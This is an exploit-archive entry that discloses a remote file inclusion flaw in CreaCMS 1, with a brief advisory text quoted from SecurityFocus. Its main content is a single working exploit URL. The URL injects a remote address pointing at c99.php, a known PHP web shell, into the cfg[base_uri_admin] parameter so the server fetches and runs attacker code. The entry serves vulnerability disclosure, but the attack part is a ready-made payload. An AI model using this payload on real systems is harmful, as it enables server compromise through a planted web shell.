CreaCMS - fonctionsget_liste_langue.php?cfg[base_uri_admin] Remote File Inclusion

2008-07-18T00:00:00
ID EXPLOITPACK:33A28A3642F29CB2EE1C204EA3908DE6
Type exploitpack
Reporter Ciph3r
Modified 2008-07-18T00:00:00

Description

CreaCMS - fonctionsget_liste_langue.php?cfg[base_uri_admin] Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/30284/info
 
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
CreaCMS 1 is vulnerable; other versions may also be affected. 

http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php?